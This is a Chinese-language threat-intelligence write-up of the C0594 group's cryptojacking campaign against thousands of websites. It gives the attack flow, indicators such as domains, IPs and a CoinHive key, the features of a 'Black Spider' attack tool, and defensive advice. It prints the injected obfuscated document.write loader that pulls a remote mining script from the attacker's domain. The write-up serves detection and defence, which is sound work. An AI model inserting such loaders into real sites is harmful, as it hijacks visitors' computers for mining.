C0594组织恶意挖矿攻击,已攻陷数千个网站
字数 1268 2025-08-18 11:37:12
C0594组织恶意挖矿攻击事件分析与防御指南
一、事件概述
腾讯御见威胁情报中心监测发现,一个名为C0594的黑客组织对包括传统企业、互联网公司、学校和政府机构在内的数千个网站实施了有组织的恶意挖矿攻击。
攻击特点:
- 通过注入恶意JS脚本实现挖矿
- 使用动态加载技术隐藏攻击行为
- 所有攻击使用相同的CoinHive Site Key
- 攻击规模大,影响范围广
二、攻击技术分析
1. 攻击流程
- 入侵网站:利用网站漏洞植入恶意代码
- 注入恶意JS:在网站核心JS文件(如jquery.cookie.js)中注入
- 动态加载:通过document.write加载远程恶意脚本
document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>') - 挖矿执行:加载的脚本(hxxp://a.c0594.com/?e=5)会调用另一个脚本(hxxp://a.c0594.com/?js=1)提供的CoinHive挖矿代码
- 收益归集:所有挖矿收益归集到同一Site Key(99nheD84S8eJK7eD4pufvR5Wd1KGjxlj)
2. 攻击工具溯源
攻击者使用名为"Black Spider"的黑帽辅助工具,该工具具有以下功能:
- 自动爬取Getshell
- 自动扫描注入点
- 自动文件探测
- 旁站C段扫描
- 漏洞扫描
- CMS安全检测
- 批量检测注入
支持的漏洞类型:
- 包含100多种建站系统漏洞
- Fck上传漏洞
- Struct漏洞
- SQL注入漏洞
- WordPress漏洞等
三、防御建议
1. 网站管理员防御措施
-
漏洞扫描与修复
- 使用腾讯企业安全"御知"(https://s.tencent.com/product/yuzhi/index.html)进行风险扫描
- 及时修复Web服务器建站系统安全漏洞
-
恶意代码检测
- 检查网站源码中是否包含
src=hxxp://a'+'.c059'+'4.com/?e=5 - 发现后立即删除相关恶意代码
- 检查网站源码中是否包含
-
防护平台部署
- 使用腾讯云网站管家智能防护平台(https://cloud.tencent.com/product/waf)
- 具备Web入侵防护、0Day漏洞补丁修复等多维度防御策略
2. 普通用户防护
- 安装腾讯电脑管家拦截含挖矿木马的网页
四、技术细节补充
-
挖矿统计:
- Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj
- 月流量达1,011,442,在网页挖矿top榜排名第56位(数据来自whorunscoinhive.com)
-
基础设施关联:
- 域名a.c0594.com曾解析到IP 62.210.181.55和47.89.176.191
- 关联域名包括xxx.c0594.com和xxx.094n.com
- 黑客工具网站member.094n.com与攻击域名存在关联
-
组织背景:
- 该组织最早活动可追溯到2014年
- 工具由Alihack.com开发
- 具有成熟的漏洞利用和攻击基础设施
五、受影响网站(部分示例)
- bayimg.co
- 其他数千个未公开名称的网站
通过以上分析和防御建议,网站管理员和用户可以有效识别和防御此类挖矿攻击。